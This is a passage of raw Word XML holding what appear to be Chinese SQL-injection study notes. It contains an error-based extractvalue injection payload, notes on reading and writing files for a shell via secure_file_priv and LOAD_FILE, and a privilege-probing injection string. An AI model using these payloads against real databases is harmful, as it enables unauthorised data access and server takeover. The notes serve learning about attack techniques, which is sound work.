          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`ip_address`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`username`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> extractvalue(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>select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version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>'12.1.1.1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>'asd'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C206DD0" w14:textId="77777777" w:rsidR="00E64C36" w:rsidRPr="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BCC66D5" w14:textId="77777777" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73136C04" w14:textId="77777777" w:rsidR="00E64C36" w:rsidRDefault="00E64C36" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EED44B1" w14:textId="2BA80493" w:rsidR="0088001C" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc159779474"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidR="00556F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="439AC837" w14:textId="77777777" w:rsidR="002054B1" w:rsidRDefault="002054B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FF69EF" w14:textId="788E42A5" w:rsidR="002054B1" w:rsidRPr="00FD6587" w:rsidRDefault="002054B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查是否有读写权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FBC8E" w14:textId="77777777" w:rsidR="002054B1" w:rsidRDefault="002054B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002054B1">
        <w:t xml:space="preserve">show variables like </w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="002054B1">
        <w:t>%secure_file_priv%</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="002054B1">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E1A7CA" w14:textId="6E14EA69" w:rsidR="002054B1" w:rsidRPr="002054B1" w:rsidRDefault="002054B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果显示空，就是没有权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43248B35" w14:textId="77777777" w:rsidR="00903ECB" w:rsidRPr="00903ECB" w:rsidRDefault="00903ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717D3074" w14:textId="77777777" w:rsidR="00903ECB" w:rsidRDefault="00903ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E33D9AF" w14:textId="77777777" w:rsidR="00903ECB" w:rsidRDefault="00903ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BAAB4F" w14:textId="77777777" w:rsidR="00903ECB" w:rsidRDefault="00903ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516268C3" w14:textId="0F438B70" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件权限</w:t>
      </w:r>
      <w:r w:rsidR="00F17585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00F17585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试不生效。。</w:t>
      </w:r>
      <w:r w:rsidR="00F17585">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4457F8" w14:textId="1E41CBC1" w:rsidR="0006514C" w:rsidRDefault="00BA2BC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>mysqld]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D32379" w14:textId="77777777" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>secure_file_priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904C741" w14:textId="77777777" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD07731" w14:textId="1DB93664" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不允许导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220070D" w14:textId="65685871" w:rsidR="0006514C" w:rsidRPr="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secure_file_prive=null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F1923A" w14:textId="6F15D724" w:rsidR="0006514C" w:rsidRPr="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能发生在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/tmp/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B83845A" w14:textId="1004A84C" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secure_file_priv=/tmp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F793CE7" w14:textId="77777777" w:rsidR="0006514C" w:rsidRPr="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392212FB" w14:textId="6B1E2D7D" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、不对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqld </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出做限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EEF56" w14:textId="77777777" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6870B35F" w14:textId="77777777" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cat /etc/my.cnf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E2A8A" w14:textId="7FC40C24" w:rsidR="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">[mysqld] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F427D" w14:textId="1F12CB79" w:rsidR="0006514C" w:rsidRPr="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secure_file_priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32181583" w14:textId="77777777" w:rsidR="0006514C" w:rsidRPr="0006514C" w:rsidRDefault="0006514C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B536AE" w14:textId="77777777" w:rsidR="002054B1" w:rsidRPr="002054B1" w:rsidRDefault="002054B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01979C33" w14:textId="055523CE" w:rsidR="00FD6587" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>导入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D9E34" w14:textId="77777777" w:rsidR="00556F3C" w:rsidRPr="00556F3C" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Load_file(file_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3C3C57" w14:textId="77777777" w:rsidR="00556F3C" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>读取文件并返回该文件的内容作为一个字符串。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087BA05F" w14:textId="77777777" w:rsidR="00556F3C" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>使用条件：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406FBC8D" w14:textId="21734B83" w:rsidR="00556F3C" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>服务角色</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>必须有权限读取并且文件必须完全可读</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> and (select count(*) from mysql.user)&gt;0/* </w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果结果返回正常</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>说明具有读写权限。</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> and (select count(*) from mysql.user)&gt;0/* </w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>返回错误，应该是管理员给数据库帐户降权</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D45DA4" w14:textId="77777777" w:rsidR="00556F3C" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t>、欲读取文件必须在服务器上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736E5454" w14:textId="7F4D42DA" w:rsidR="00556F3C" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>、必须指定文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>绝对路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305009EC" w14:textId="66194B65" w:rsidR="00FD6587" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>、欲读取文件必须小于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> max_allowed_packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099981D3" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61162785" w14:textId="4EADBF89" w:rsidR="00FD6587" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
